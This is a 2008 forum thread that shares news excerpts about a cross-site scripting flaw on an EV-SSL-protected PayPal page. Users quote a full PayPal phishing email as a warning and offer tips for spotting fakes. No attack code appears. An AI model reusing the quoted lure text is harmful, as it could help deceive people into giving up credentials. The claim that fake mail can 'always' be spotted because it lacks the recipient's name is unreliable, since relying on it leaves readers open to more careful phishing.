Spyware, Viruses, & Security forum

General discussion

'Secure' PayPal page is... you guessed it

by Marianna Schmudlach / May 16, 2008 7:46 AM PDT

Extended SSL no match for the power of XSS
By Dan Goodin in San Francisco

Published Friday 16th May 2008

A serious scripting error has been discovered on PayPal that could enable attackers to create convincing spoof pages that steal users' authentication credentials..

The cross-site scripting bug is made all the more critical because it resides on a page that uses an extended validation secure sockets layer certificate. The new-fangled SSL mechanism is designed to give users a higher degree of confidence that the page they're visiting is secure by turning their browser address bar green.

More: http://www.theregister.co.uk/2008/05/16/paypal_page_succumbs_to_xss/

Discussion is locked
You are posting a reply to: 'Secure' PayPal page is... you guessed it
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: 'Secure' PayPal page is... you guessed it
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
I just tried it.
by PudgyOne / May 16, 2008 8:16 AM PDT

It looks safe to me and Mozilla Firefox didn't give me any warnings. I signed in and then back out again.

There have been emails that I just started getting the past gew days that claimed they were from PayPal, but I have a way of knowing they weren't real. Wondering if someone clicked on one of those links and got taken to the fake PayPal website.

Fake emails also has fake url. If you get this email, Do NOT respond. Delete it.


From: service@paypal.com Fake = <support@services.org>

Subject: Notification of Limited Account Access

Dear PayPal Member,

As part of our efforts to provide a safe and secure environment for the online community, we regularly screen account activity. While reviewing your PayPal accounts, we observed activity that we would like to further verify. For this reason, limitations have been placed on your account until your will review your registered intormation. In order to resolve the account limitations, complete our online form by clicking on the following link :

Log into your PayPal account

After we have gathered the necessary information, your account will be reviewed for reinstatement and you will be notified by e-mail of our decision.

We thank you for your prompt attention to this matter and apologize for any inconvenience.

Account Review Department

Collapse -
by moranacus / May 17, 2008 4:57 AM PDT
In reply to: I just tried it.

Unless the FAKE PAYPAY MESSAGE creators find a way to actually put your name in the emails then you will always know that they are fake.
Really PAYPAL messages address you by name. FAKE EMAILS don't.

Collapse -
First, they'd have to
by PudgyOne / May 17, 2008 6:26 AM PDT
In reply to: Unless

find out what your full name is.

They are sending the fake emails to a email account that doesn't have a PayPal account. Wonder how I figured out it was fake.

Full Name needed and proper email account. Header was also wrong.


Collapse -
PayPal flaw raises questions about EV-SSL
by Marianna Schmudlach / May 19, 2008 5:44 AM PDT

19 May 2008

By Matthew Broersma, Techworld.com
eBay's PayPal has acknowledged a serious cross-site scripting (XSS) flaw that could be used to steal user credentials or cookies.

The page affected used an Extended Validation SSL (EV-SSL) certificate, according to Harry Sintonen, the Finnish researcher who discovered the flaw, casting doubt on the claims of EV-SSL to assure users of more secure web pages.
The flaw surfaced just as PayPal was hit by a technical bug that has caused chaos for many e-commerce websites.
Sintonen on Friday demonstrated the use of cross-site scripting on a PayPal web page to prompt users for their login credentials and send the credentials to an unauthorised server, according to several industry reports.

More: http://www.techworld.com/security/news/index.cfm?RSS&NewsID=101535

Popular Forums
Computer Newbies 10,686 discussions
Computer Help 54,365 discussions
Laptops 21,181 discussions
Networking & Wireless 16,313 discussions
Phones 17,137 discussions
Security 31,287 discussions
TVs & Home Theaters 22,101 discussions
Windows 7 8,164 discussions
Windows 10 2,657 discussions


Your favorite shows are back!

Don’t miss your dramas, sitcoms and reality shows. Find out when and where they’re airing!